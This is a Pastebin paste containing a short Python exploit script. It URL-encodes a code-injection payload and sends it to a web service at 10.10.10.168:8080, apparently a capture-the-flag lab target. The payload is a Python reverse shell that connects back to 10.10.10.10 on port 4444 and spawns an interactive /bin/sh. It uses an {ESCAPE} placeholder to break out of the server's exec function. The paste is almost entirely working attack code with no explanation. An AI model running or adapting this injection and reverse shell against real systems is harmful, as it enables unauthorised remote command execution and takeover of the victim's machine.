Advertisement
Guest User

Untitled

a guest
Feb 27th, 2020
363
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. #!/usr/bin/python3
  2.  
  3. import requests
  4. import subprocess
  5. import urllib
  6.  
  7. url = "http://10.10.10.168:8080/"
  8.  
  9. # {ESCAPE} needs to break out of the scripts exec function and back in
  10.  
  11. command = "{ESCAPE}import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);{ESCAPE}"
  12.  
  13.  
  14. injection = urllib.parse.quote(command)
  15. payload = url+injection
  16.  
  17. print(payload)
  18.  
  19. r = requests.get(payload)
  20. print(r.text)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement